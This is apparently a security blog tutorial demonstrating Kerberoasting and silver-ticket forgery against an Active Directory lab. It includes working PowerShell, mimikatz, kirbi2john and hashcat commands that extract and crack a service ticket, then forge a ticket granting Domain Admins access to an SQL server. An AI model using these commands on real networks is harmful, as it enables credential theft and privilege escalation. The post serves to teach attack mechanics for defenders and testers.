Kerberoasting is an attack allowing an attacker to crack Active Directory (AD) service account passwords offline, and with no fear of detection.
Developed by Tim Medin, Kerberoasting relies on the fact that when an AD user requests access to a service, they receive back a Kerberos ticket signed with the NTLM hash of the account running the service, which an attacker can steal — even if they are a regular domain user — and crack elsewhere.
With that service account password in hand, one can then forge a “silver ticket” for that service, creating opportunities for privilege escalation.
MS Kerberos
MS Kerberos handles requests for access to network services and resources by issuing users an initial authentication token, the ticket-granting ticket (TGT), and then issuing session keys for access to specific resources as they’re requested.
Step-by-step, when a user authenticates to the domain:
- They send their credentials to the domain controller (DC)
- The DC validates the credentials, checks the user information group membership and login restrictions, then sends the client a ticket-granting ticket (TGT), which is encrypted and signed. Only the Kerberos service can open and read the TGT.
- The client session manager will store the TGT and request a new one whenever the old one expires
Then, when a user requests access to a particular resource or service:
- The client sends the TGT to the DC, with the Service Principle Name (SPN) of the resource it wants to access
- The DC validates the TGT (which, again, only it can open) and if opens and has a valid checksum, copies the data from the TGT into the new Ticket Granting Service (TGS) ticket. The TGS is encrypted with the NTLM password hash of the requested service, and sent back to the client.
- The client forwards the new TGS to the service it’s trying to access, which decrypts the ticket using its NTLM password hash. The service validates the TGS, typically without contacting the DC again.
Kerberoasting attacks step 5 of this process, while silver tickets attack step 6.
Given that the TGS is encrypted with the NTLM hash of the requested service, when extracted from the kerberos service with a tool like Mimikatz, it can be copied off-line and cracked with brute-force tools such as John the Ripper or hashcat.
Once an attacker has cracked the password for the service, they can use that password to create a new, forged TGS, which the target service will accept as valid, the so-called “silver ticket”.
Kerberoasting
Any domain user can request TGSs, making kerberoasting and silver tickets a useful way to escalate privileges. Tim Medin’s original kerberoasting toolkit contains both a PowerShell and a VisualBasic script for identifying SPNs, either “GetUserSPNs.ps1” or “GetUserSPNs.vbs”
In this case, the target SPN is MSSQLSvc/2016-server.isb.lab.local:1433
Once you have the SPN, you can request a TGS with a couple of lines of PowerShell
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ‘MSSQLSvc/2016-server.isb.lab.local:1433’
Now we can run a single mimikatz command to capture the kerberos tickets
kerberos::list /export
Copy the TGS off the compromised machine, run it through the kirbi2john.py tool (also in Tim’s toolkit), which will get it into a format either John or hashcat can handle.
jmpalk@kali:~/chaocloud/bloodhound/kerberoast$ python3 kirbi2john.py 1-40a10000-stpr-1138@MSSQLSvc~2016-server.isb.lab.local~1433-ISB.LAB.LOCAL.kirbi > mssql.txt tickets written: 1
Then run it through hashcat
.\hashcat.exe -m 13100 -a 0 Z:\bloodhound\kerberoast\mssql.txt .\example.dict -O
And there’s the cracked password ‘P4ssword123’.
Silver Tickets
With the password for the service account in hand, we need to get the NTLM hash for that password. This can be done with three lines of python (all credit to TrustedSec for this)
jmpalk@kali:~/chaocloud/bloodhound/kerberoast$ python3
Python 3.8.4 (default, Jul 13 2020, 21:16:07)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib,binascii
>>> hash = hashlib.new('md4', "P4ssword123".encode('utf-16le')).digest()
>>> print(binascii.hexlify(hash))
>>> b'c1fc37edabedb382c5141e88ce614b11'
>>>
With the NTLM hash, we then return to the compromised machine.
We also need the Domain SID, which can be obtained by running the command
whoami /user
We also need the target host and port, and the name of a service running as the service account we compromised. In this case, that’s 2016-server.isb.lab.local:1433, and MSSQLSvc. Now for the fun part: remember how the service doesn’t typically check back with the Domain Controller when it receives a ticket that’s been encrypted with its password? We can control the user the ticket is written for and the groups in the Privileged Attribute Certificate (PAC). We can specify any user we like for the ticket, including a user who doesn’t even exist. And, by default, mimikatz adds the Domain Admins group, although you can override this, if you wish.
The mimikatz command is:
kerberos::golden /sid:S-1-5-21-1247694514-2056305760-2497134065 /domain:isb.lab.local /ptt /id:1604 /target:2016-server.isb.lab.local:1433 /service:MSSQLSvc /rc4:c1fc37edabedb382c5141e88ce614b11 /user:ObiWan
If you run ‘klist’ after exiting mimikatz, you will see your new kerberos ticket for the target server and resource in the cache.
And if you’ve assigned the ticket either the user ID or a group membership with access to the SQL server, you can use the ticket to log in to that server. For purposes of this demo, I configured the SQL server to permit logins by Domain Admins, which is one of the default groups mimikatz will assign to the ticket.
References
- Red Siege/Tim Medin – Kerberoast and Attacks 101
- Varonis: Kerberos Authentication Explained
- Black Hills Information Security: A Toast to Kerberost
- Insider Threat Security Blog – Extracting Service Account Passwords with Kerberoasting
- Insider Threat Security Blog – Impersonating Service Accounts With Silver Tickets
- TrustedSec – Generate an NTLM Hash in 3 Lines of Python
- And, a special thanks to Charlie Clark in the Bloodhound Slack for helping me sort out some stumbling blocks around SQL server access at the end.
-30-
Off-Kilter Security 